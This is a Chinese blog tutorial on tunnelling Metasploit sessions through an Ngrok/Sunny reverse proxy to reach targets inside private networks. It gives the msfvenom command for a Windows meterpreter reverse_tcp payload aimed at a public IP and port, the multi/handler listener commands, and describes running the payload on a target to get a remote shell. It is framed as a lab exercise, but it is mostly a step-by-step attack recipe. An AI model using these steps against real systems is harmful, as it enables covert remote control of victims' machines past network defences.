MSF配合Ngrock穿透内网

当被攻击目标在内网无法与本地直接建立会话时,需要公网地址监听并转发会话。此时解决办法有:

1.msf安装在公网上;
2.使用公网进行转发 。

Ngrok 是一个反向代理,通过在公共的端口和本地运行的 Web 服务器之间建立一个安全的通道。可捕获和分析所有通道上的流量,便于后期分析和重放。它是内网穿透的跳板。

一、搭建ngrock服务器

官网:https://ngrok.cc/

在官网注册账号,这里实验使用免费版。注意:免费版可能无法加载会话,为我这种穷b准备的。
在这里插入图片描述
设置监听端口:
在这里插入图片描述
复制隧道id。选择版本进行客户端下载:
在这里插入图片描述
在这里插入图片描述
下载完成。在kali里直接运行:

./sunny clientid b86088bd6xxxxxx

后面这一串是购买时ngrock附送的隧道id;ngrock客户端与服务器建立连接,不要关闭这个窗口。
在这里插入图片描述

二、msf生成payload:

msfvenom -p windows/meterpreter/reverse_tcp lhost=64.69.43.237 lport=10147 -f

在这里插入图片描述
这里监听的lhost和lport需要设置成购买ngrock时附送的域名和端口,为了防止dns解析出现问题,在生成payload时使用IP而不是使用域名。
在这里插入图片描述
msf 建立监听:

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 127.0.0.1
set lport 10147
run

在这里插入图片描述
ps: 建立监听时设置的IP是127.0.0.1,因为ngrock是与127.0.0.1建立的会话

三、靶机运行payload建立会话

将刚刚生成的payload a.exe放到靶机里面并运行,成功建立会话:
在这里插入图片描述
msf里面成功返回会话即可输入shell创建连接:
在这里插入图片描述
实验成功

ps:由于实验是白嫖的免费版ngrock,所有很卡很慢很不稳定还不一定能够成功返回会话。这里靶机运行了十多次才返回会话。所以还是收费版本比较香
在这里插入图片描述

=========================================================
在这里插入图片描述

  • 1
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值